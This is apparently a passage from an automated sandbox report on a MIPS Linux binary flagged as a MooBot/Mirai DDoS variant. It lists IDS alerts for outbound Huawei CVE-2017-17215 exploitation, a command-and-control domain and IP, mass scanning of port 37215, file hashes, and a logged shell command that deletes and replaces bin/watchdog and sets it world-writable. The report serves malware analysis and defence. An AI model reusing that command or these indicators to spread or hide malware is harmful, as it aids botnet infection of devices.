              		37164ZAIN-SLfalse
              41.165.220.194
              		unknownSouth Africa
              		36937Neotel-ASZAfalse
              41.51.170.24
              		unknownSouth Africa
              		37168CELL-CZAfalse
              157.155.254.125
              		unknownAustralia
              		17983COLESMYER-AS-APColesMyerAUfalse
              41.213.144.200
              		unknownReunion
              		37002ReunicableREfalse
              157.26.73.179
              		unknownSwitzerland
              		559SWITCHPeeringrequestspeeringswitchchEUfalse
              197.225.163.192
              		unknownMauritius
              		23889MauritiusTelecomMUfalse
              203.117.207.148
              		unknownSingapore
              		4657STARHUB-INTERNETStarHubLtdSGfalse
              41.83.144.208
              		unknownSenegal
              		8346SONATEL-ASAutonomousSystemEUfalse
              41.76.254.8
              		unknownNigeria
              		37286NG-ICT-FORUMNGfalse
              197.5.202.118
              		unknownTunisia
              		5438ATI-TNfalse
              117.90.147.24
              		unknownChina
              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              157.139.31.146
              		unknownUnited States
              		20252JSIWMCUSfalse
              70.43.200.100
              		unknownUnited States
              		7029WINDSTREAMUSfalse
              197.211.54.73
              		unknownNigeria
              		37148globacom-asNGfalse
              124.245.211.133
              		unknownJapan7671MCNETNTTSmartConnectCorporationJPfalse
              93.213.159.141
              		unknownGermany
              		3320DTAGInternetserviceprovideroperationsDEfalse
              134.61.198.10
              		unknownGermany
              		47610RWTH-ASDEfalse
              107.118.129.135
              		unknownUnited States
              		20057ATT-MOBILITY-LLC-AS20057USfalse
              157.175.206.68
              		unknownUnited States
              		16509AMAZON-02USfalse
              197.136.212.68
              		unknownKenya
              		36914KENET-ASKEfalse
              197.240.178.142
              		unknownunknown
              		37705TOPNETTNfalse
              41.12.83.171
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              143.20.10.228
              		unknownUnited States
              		264008LANCAMANTOANISERVICOSDEINFORMATICALTDA-MEBRfalse
              197.69.35.16
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              197.173.143.31
              		unknownSouth Africa
              		37168CELL-CZAfalse
              157.215.57.56
              		unknownUnited States
              		4704SANNETRakutenMobileIncJPfalse
              41.224.199.212
              		unknownTunisia
              		37492ORANGE-TNfalse
              53.174.9.169
              		unknownGermany
              		31399DAIMLER-ASITIGNGlobalNetworkDEfalse
              157.220.249.137
              		unknownUnited States
              		4704SANNETRakutenMobileIncJPfalse
              144.177.101.154
              		unknownNorway
              		4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
              157.37.64.93
              		unknownIndia
              		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
              96.195.150.65
              		unknownUnited States
              		7922COMCAST-7922USfalse
              197.12.117.173
              		unknownTunisia
              		37703ATLAXTNfalse
              197.46.218.171
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              106.90.178.87
              		unknownChina
              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              121.166.75.153
              		unknownKorea Republic of
              		4766KIXS-AS-KRKoreaTelecomKRfalse
              197.180.156.79
              		unknownKenya
              		33771SAFARICOM-LIMITEDKEfalse
              197.17.21.185
              		unknownTunisia
              		37693TUNISIANATNfalse
              157.120.215.120
              		unknownJapan9604FSI-ASFUJISOFTINCORPORATEDJPfalse
              197.204.213.186
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              197.179.230.74
              		unknownKenya
              		33771SAFARICOM-LIMITEDKEfalse
              41.231.153.146
              		unknownTunisia
              		5438ATI-TNfalse
              166.204.123.155
              		unknownUnited States
              		20057ATT-MOBILITY-LLC-AS20057USfalse
              41.130.176.218
              		unknownEgypt
              		24863LINKdotNET-ASEGfalse
              197.99.166.220
              		unknownSouth Africa
              		3741ISZAfalse
              197.165.117.160
              		unknownEgypt
              		24863LINKdotNET-ASEGfalse
              61.199.88.126
              		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
              157.42.18.29
              		unknownIndia
              		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
              186.236.123.240
              		unknownBrazil
              		53131GBTECNOLOGIAEMONITORAMENTOEIRELIBRfalse
              41.121.55.46
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              157.148.116.57
              		unknownChina
              		136958UNICOM-GUANGZHOU-IDCChinaUnicomGuangdongIPnetworkCNfalse
              186.65.237.188
              		unknownChile
              		27680TELEFONICAMOVILDECHILESACLfalse
              39.150.131.210
              		unknownChina
              		24445CMNET-V4HENAN-AS-APHenanMobileCommunicationsCoLtdCNfalse
              41.205.215.93
              		unknownMorocco
              		36925ASMediMAfalse
              68.179.215.229
              		unknownUnited States
              		10430WA-K20USfalse
              157.139.31.134
              		unknownUnited States
              		20252JSIWMCUSfalse
              151.253.220.12
              		unknownUnited Arab Emirates
              		5384EMIRATES-INTERNETEmiratesInternetAEfalse
              197.73.232.47
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              197.96.225.174
              		unknownSouth Africa
              		3741ISZAfalse
              13.59.33.208
              		unknownUnited States
              		16509AMAZON-02USfalse
              41.3.151.154
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              197.227.254.209
              		unknownMauritius
              		23889MauritiusTelecomMUfalse
              197.239.252.138
              		unknownunknown
              		36974AFNET-ASCIfalse
              98.178.75.120
              		unknownUnited States
              		22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
              41.44.168.31
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              41.217.104.40
              		unknownNigeria
              		37340SpectranetNGfalse
              197.222.122.211
              		unknownEgypt
              		37069MOBINILEGfalse
              41.108.245.6
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              41.15.56.36
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              157.121.53.53
              		unknownUnited States
              		2514INFOSPHERENTTPCCommunicationsIncJPfalse
              157.146.115.27
              		unknownUnited States
              		719ELISA-ASHelsinkiFinlandEUfalse
              197.122.223.222
              		unknownEgypt
              		36992ETISALAT-MISREGfalse
              41.3.83.208
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              41.36.233.3
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              131.124.97.114
              		unknownUnited States
              		15329UNASSIGNEDfalse
              197.200.106.225
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              157.37.88.95
              		unknownIndia
              		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
              41.216.98.181
              		unknownMauritius
              		37006LiquidTelecommunicationRwandaRWfalse
              39.147.18.97
              		unknownChina
              		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
              197.202.209.139
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              157.227.53.36
              		unknownAustralia
              		4704SANNETRakutenMobileIncJPfalse
              197.109.110.86
              		unknownSouth Africa
              		37168CELL-CZAfalse
              178.40.173.81
              		unknownSlovakia (SLOVAK Republic)
              		6855SK-TELEKOMSKfalse
              187.60.245.182
              		unknownBrazil
              		28161PiernetTelecomBRfalse
              157.157.39.30
              		unknownIceland
              		6677ICENET-AS1ISfalse
              197.193.180.204
              		unknownEgypt
              		36992ETISALAT-MISREGfalse
              157.101.52.55
              		unknownJapan27947TelconetSAECfalse
              41.83.26.215
              		unknownSenegal
              		8346SONATEL-ASAutonomousSystemEUfalse

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
              Entropy (8bit):5.442327939522003
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:8lsvVMbYw7.elf
              File size:84780
              MD5:4db30b3742977f4175543bcc258bba08
              SHA1:d4934ed96152dfae36f4b9421b5f5b602f9ed6fe
              SHA256:7e4dadf93fbb7a01b55eadacbb40ae8d5e95f5b9592e55f0fb2340d89fc78f17
              SHA512:5d7111eb62f6758cdf57839190d451713a146931e0ce63975f02de2ab51d69f0122a59b9982138a2a62893e1256622822e73b1eaa077f1d0e45a74c53f0e0935
              SSDEEP:768:2ty6IP7M/kq0INRhfuN2Eo9tl/de2YIwHKRH0I84EH6UTC7ZDYovZ73x/nL8y8QP:Rakdn2Eo3ePu5GTCRYo99Be037WQ/
              TLSH:C883A51E7E228FADF76D823147B74E25A69833C627E1D641E16CD6012E6034E641FFE8
              File Content Preview:.ELF.....................@.`...4..H......4. ...(.............@...@....6`..6`..............@..E@..E@.......+.........dt.Q............................<...'..\...!'.......................<...'..8...!... ....'9... ......................<...'......!........'9.

              Static ELF Info

              ELF header

              Class:
              Data:
              Version:
              Machine:
              Version Number:
              Type:
              OS/ABI:
              ABI Version:
              Entry Point Address:
              Flags:
              ELF Header Size:
              Program Header Offset:
              Program Header Size:
              Number of Program Headers:
              Section Header Offset:
              Section Header Size:
              Number of Section Headers:
              Header String Table Index:

              Sections

              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x4000940x940x8c0x00x6AX004
              .textPROGBITS0x4001200x1200x115d00x00x6AX0016
              .finiPROGBITS0x4116f00x116f00x5c0x00x6AX004
              .rodataPROGBITS0x4117500x117500x1f100x00x2A0016
              .ctorsPROGBITS0x4540000x140000x80x00x3WA004
              .dtorsPROGBITS0x4540080x140080x80x00x3WA004
              .data.rel.roPROGBITS0x4540140x140140x440x00x3WA004
              .dataPROGBITS0x4540600x140600x3a00x00x3WA0016
              .gotPROGBITS0x4544000x144000x4980x40x10000003WAp0016
              .sbssNOBITS0x4548980x148980x1c0x00x10000003WAp004
              .bssNOBITS0x4548c00x148980x22500x00x3WA0016
              .mdebug.abi32PROGBITS0x9c60x148980x00x00x0001
              .shstrtabSTRTAB0x00x148980x640x00x0001

              Program Segments

              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x4000000x4000000x136600x136605.58010x5R E0x10000.init .text .fini .rodata
              LOAD0x140000x4540000x4540000x8980x2b103.88820x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.2393.94.199.11953672372152835222 03/20/23-16:21:16.976524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367237215192.168.2.2393.94.199.119
              192.168.2.2394.187.107.9039438372152835222 03/20/23-16:21:34.558345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3943837215192.168.2.2394.187.107.90
              192.168.2.23203.6.74.10537918372152835222 03/20/23-16:21:45.948271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3791837215192.168.2.23203.6.74.105
              192.168.2.238.8.8.843281532023883 03/20/23-16:20:44.511900UDP2023883ET DNS Query to a *.top domain - Likely Hostile4328153192.168.2.238.8.8.8
              156.224.24.249192.168.2.2356999477962030489 03/20/23-16:21:24.722739TCP2030489ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response5699947796156.224.24.249192.168.2.23
              156.224.24.249192.168.2.2356999478062030489 03/20/23-16:22:44.755597TCP2030489ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response5699947806156.224.24.249192.168.2.23
              192.168.2.23197.234.43.11049508372152835222 03/20/23-16:22:30.124421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4950837215192.168.2.23197.234.43.110
              192.168.2.2341.36.73.5245328372152835222 03/20/23-16:21:23.129262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532837215192.168.2.2341.36.73.52
              192.168.2.23156.224.24.24947806569992030490 03/20/23-16:21:34.964696TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)4780656999192.168.2.23156.224.24.249
              192.168.2.23197.39.71.7358096372152835222 03/20/23-16:22:16.668019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5809637215192.168.2.23197.39.71.73
              192.168.2.2386.71.8.24242520372152835222 03/20/23-16:22:02.177570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252037215192.168.2.2386.71.8.242
              192.168.2.23156.224.24.24947796569992030490 03/20/23-16:20:45.109110TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)4779656999192.168.2.23156.224.24.249
              192.168.2.23192.107.143.15947896372152835222 03/20/23-16:22:19.853858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4789637215192.168.2.23192.107.143.159
              192.168.2.238.8.8.846438532023883 03/20/23-16:21:34.369876UDP2023883ET DNS Query to a *.top domain - Likely Hostile4643853192.168.2.238.8.8.8

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Mar 20, 2023 16:20:43.485317945 CET42836443192.168.2.2391.189.91.43
              Mar 20, 2023 16:20:43.741290092 CET4251680192.168.2.23109.202.202.202
              Mar 20, 2023 16:20:44.547441006 CET3110537215192.168.2.23113.66.95.51
              Mar 20, 2023 16:20:44.547596931 CET3110537215192.168.2.2341.109.134.160
              Mar 20, 2023 16:20:44.547679901 CET3110537215192.168.2.23122.238.154.25
              Mar 20, 2023 16:20:44.547684908 CET3110537215192.168.2.2361.122.23.148
              Mar 20, 2023 16:20:44.547693968 CET3110537215192.168.2.23113.167.180.50
              Mar 20, 2023 16:20:44.547693968 CET3110537215192.168.2.23197.154.145.3
              Mar 20, 2023 16:20:44.547697067 CET3110537215192.168.2.23197.50.135.0
              Mar 20, 2023 16:20:44.547703028 CET3110537215192.168.2.23137.60.152.96
              Mar 20, 2023 16:20:44.548110962 CET3110537215192.168.2.23197.4.125.26
              Mar 20, 2023 16:20:44.548122883 CET3110537215192.168.2.23161.127.238.63
              Mar 20, 2023 16:20:44.548135042 CET3110537215192.168.2.23157.202.140.177
              Mar 20, 2023 16:20:44.548151016 CET3110537215192.168.2.2341.249.139.35
              Mar 20, 2023 16:20:44.548187017 CET3110537215192.168.2.23197.191.6.8
              Mar 20, 2023 16:20:44.548207998 CET3110537215192.168.2.2341.56.211.70
              Mar 20, 2023 16:20:44.548300028 CET3110537215192.168.2.23157.185.236.211
              Mar 20, 2023 16:20:44.548396111 CET3110537215192.168.2.2341.132.98.11
              Mar 20, 2023 16:20:44.548396111 CET3110537215192.168.2.23197.68.19.229
              Mar 20, 2023 16:20:44.548401117 CET3110537215192.168.2.23197.107.162.20
              Mar 20, 2023 16:20:44.548403025 CET3110537215192.168.2.23197.174.60.2
              Mar 20, 2023 16:20:44.548479080 CET3110537215192.168.2.23197.244.224.7
              Mar 20, 2023 16:20:44.548497915 CET3110537215192.168.2.2341.169.228.69
              Mar 20, 2023 16:20:44.548497915 CET3110537215192.168.2.23157.76.14.187
              Mar 20, 2023 16:20:44.548578978 CET3110537215192.168.2.2341.30.143.132
              Mar 20, 2023 16:20:44.548741102 CET3110537215192.168.2.2341.148.20.226
              Mar 20, 2023 16:20:44.548829079 CET3110537215192.168.2.23197.223.141.146
              Mar 20, 2023 16:20:44.548913002 CET3110537215192.168.2.23197.67.169.11
              Mar 20, 2023 16:20:44.548933983 CET3110537215192.168.2.23197.198.131.180
              Mar 20, 2023 16:20:44.548938036 CET3110537215192.168.2.23197.52.236.172
              Mar 20, 2023 16:20:44.548938036 CET3110537215192.168.2.23157.47.2.0
              Mar 20, 2023 16:20:44.548940897 CET3110537215192.168.2.23197.40.126.72
              Mar 20, 2023 16:20:44.548988104 CET3110537215192.168.2.23157.34.71.4
              Mar 20, 2023 16:20:44.548989058 CET3110537215192.168.2.2365.17.4.212
              Mar 20, 2023 16:20:44.548995018 CET3110537215192.168.2.23157.184.22.246
              Mar 20, 2023 16:20:44.549001932 CET3110537215192.168.2.2341.139.140.184
              Mar 20, 2023 16:20:44.549001932 CET3110537215192.168.2.23121.61.208.71
              Mar 20, 2023 16:20:44.549027920 CET3110537215192.168.2.23157.167.73.218
              Mar 20, 2023 16:20:44.549037933 CET3110537215192.168.2.23157.186.90.102
              Mar 20, 2023 16:20:44.549050093 CET3110537215192.168.2.23197.28.204.27
              Mar 20, 2023 16:20:44.549071074 CET3110537215192.168.2.23157.160.77.243
              Mar 20, 2023 16:20:44.549309969 CET3110537215192.168.2.23197.105.52.70
              Mar 20, 2023 16:20:44.549330950 CET3110537215192.168.2.2341.195.120.236
              Mar 20, 2023 16:20:44.549348116 CET3110537215192.168.2.23213.112.8.47
              Mar 20, 2023 16:20:44.549427986 CET3110537215192.168.2.23157.153.101.69
              Mar 20, 2023 16:20:44.549434900 CET3110537215192.168.2.2341.7.246.144
              Mar 20, 2023 16:20:44.549504995 CET3110537215192.168.2.23197.215.196.144
              Mar 20, 2023 16:20:44.549505949 CET3110537215192.168.2.2341.169.82.231
              Mar 20, 2023 16:20:44.549524069 CET3110537215192.168.2.2341.93.244.82
              Mar 20, 2023 16:20:44.549544096 CET3110537215192.168.2.23157.158.216.93
              Mar 20, 2023 16:20:44.549705982 CET3110537215192.168.2.2341.247.231.164
              Mar 20, 2023 16:20:44.549721003 CET3110537215192.168.2.2341.193.127.116
              Mar 20, 2023 16:20:44.549721003 CET3110537215192.168.2.2341.248.251.58
              Mar 20, 2023 16:20:44.549725056 CET3110537215192.168.2.2341.65.231.5
              Mar 20, 2023 16:20:44.549731016 CET3110537215192.168.2.23157.133.239.12
              Mar 20, 2023 16:20:44.549732924 CET3110537215192.168.2.23122.179.227.216
              Mar 20, 2023 16:20:44.549734116 CET3110537215192.168.2.23157.82.35.181
              Mar 20, 2023 16:20:44.550081968 CET3110537215192.168.2.23157.145.245.102
              Mar 20, 2023 16:20:44.550117016 CET3110537215192.168.2.2341.170.67.125
              Mar 20, 2023 16:20:44.550134897 CET3110537215192.168.2.23157.142.164.245
              Mar 20, 2023 16:20:44.550194025 CET3110537215192.168.2.23157.113.199.180
              Mar 20, 2023 16:20:44.550268888 CET3110537215192.168.2.23197.186.17.35
              Mar 20, 2023 16:20:44.550273895 CET3110537215192.168.2.23194.35.96.169
              Mar 20, 2023 16:20:44.550291061 CET3110537215192.168.2.23197.103.126.76
              Mar 20, 2023 16:20:44.550323963 CET3110537215192.168.2.23157.152.167.176
              Mar 20, 2023 16:20:44.550376892 CET3110537215192.168.2.23157.131.253.226
              Mar 20, 2023 16:20:44.550381899 CET3110537215192.168.2.23197.122.217.85
              Mar 20, 2023 16:20:44.550390005 CET3110537215192.168.2.23197.15.186.94
              Mar 20, 2023 16:20:44.550390959 CET3110537215192.168.2.2341.75.214.67
              Mar 20, 2023 16:20:44.550395966 CET3110537215192.168.2.23157.122.135.73
              Mar 20, 2023 16:20:44.550424099 CET3110537215192.168.2.23151.41.106.32
              Mar 20, 2023 16:20:44.550429106 CET3110537215192.168.2.23180.97.152.235
              Mar 20, 2023 16:20:44.550507069 CET3110537215192.168.2.23157.84.193.27
              Mar 20, 2023 16:20:44.550556898 CET3110537215192.168.2.23157.64.220.216
              Mar 20, 2023 16:20:44.550565958 CET3110537215192.168.2.23157.125.2.202
              Mar 20, 2023 16:20:44.550698042 CET3110537215192.168.2.2376.192.60.199
              Mar 20, 2023 16:20:44.550734997 CET3110537215192.168.2.23197.103.48.145
              Mar 20, 2023 16:20:44.550754070 CET3110537215192.168.2.23197.166.60.208
              Mar 20, 2023 16:20:44.550770998 CET3110537215192.168.2.23107.153.39.244
              Mar 20, 2023 16:20:44.550789118 CET3110537215192.168.2.2352.192.201.207
              Mar 20, 2023 16:20:44.550807953 CET3110537215192.168.2.23157.131.86.130
              Mar 20, 2023 16:20:44.550831079 CET3110537215192.168.2.2319.68.91.41
              Mar 20, 2023 16:20:44.550961971 CET3110537215192.168.2.2341.74.111.123
              Mar 20, 2023 16:20:44.550971985 CET3110537215192.168.2.23157.64.145.172
              Mar 20, 2023 16:20:44.550976038 CET3110537215192.168.2.23157.230.196.110
              Mar 20, 2023 16:20:44.550976038 CET3110537215192.168.2.23197.47.7.131
              Mar 20, 2023 16:20:44.550981045 CET3110537215192.168.2.23157.117.194.51
              Mar 20, 2023 16:20:44.551013947 CET3110537215192.168.2.23157.36.213.149
              Mar 20, 2023 16:20:44.551038027 CET3110537215192.168.2.2341.231.85.38
              Mar 20, 2023 16:20:44.551065922 CET3110537215192.168.2.23197.155.201.198
              Mar 20, 2023 16:20:44.551101923 CET3110537215192.168.2.23197.141.161.235
              Mar 20, 2023 16:20:44.551178932 CET3110537215192.168.2.2341.14.246.40
              Mar 20, 2023 16:20:44.551271915 CET3110537215192.168.2.2341.89.253.148
              Mar 20, 2023 16:20:44.551273108 CET3110537215192.168.2.23157.202.97.54
              Mar 20, 2023 16:20:44.551275015 CET3110537215192.168.2.2341.52.32.193
              Mar 20, 2023 16:20:44.551290989 CET3110537215192.168.2.23157.141.9.153
              Mar 20, 2023 16:20:44.554837942 CET3110537215192.168.2.2341.37.176.90
              Mar 20, 2023 16:20:44.554914951 CET3110537215192.168.2.23196.157.64.244
              Mar 20, 2023 16:20:44.554917097 CET3110537215192.168.2.2362.85.97.221
              Mar 20, 2023 16:20:44.554925919 CET3110537215192.168.2.23185.74.219.77

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Mar 20, 2023 16:20:44.511899948 CET192.168.2.238.8.8.80xbd46Standard query (0)j.xnyidc.topA (IP address)IN (0x0001)false
              Mar 20, 2023 16:21:34.369875908 CET192.168.2.238.8.8.80x9d8aStandard query (0)j.xnyidc.topA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Mar 20, 2023 16:20:44.889858007 CET8.8.8.8192.168.2.230xbd46No error (0)j.xnyidc.top156.224.24.249A (IP address)IN (0x0001)false
              Mar 20, 2023 16:21:34.751024961 CET8.8.8.8192.168.2.230x9d8aNo error (0)j.xnyidc.top156.224.24.249A (IP address)IN (0x0001)false

              System Behavior

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/tmp/8lsvVMbYw7.elf
              Arguments:/tmp/8lsvVMbYw7.elf
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/tmp/8lsvVMbYw7.elf
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/bin/sh
              Arguments:sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/8lsvVMbYw7.elf bin/watchdog; chmod 777 bin/watchdog"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/usr/bin/rm
              Arguments:rm -rf bin/watchdog
              File size:72056 bytes
              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/usr/bin/mkdir
              Arguments:mkdir bin
              File size:88408 bytes
              MD5 hash:088c9d1df5a28ed16c726eca15964cb7

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/usr/bin/mv
              Arguments:mv /tmp/8lsvVMbYw7.elf bin/watchdog
              File size:149888 bytes
              MD5 hash:504f0590fa482d4da070a702260e3716

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/usr/bin/chmod
              Arguments:chmod 777 bin/watchdog
              File size:63864 bytes
              MD5 hash:739483b900c045ae1374d6f53a86a279

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/tmp/8lsvVMbYw7.elf
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/tmp/8lsvVMbYw7.elf
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:16:20:43
              Start date:20/03/2023
              Path:/tmp/8lsvVMbYw7.elf
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c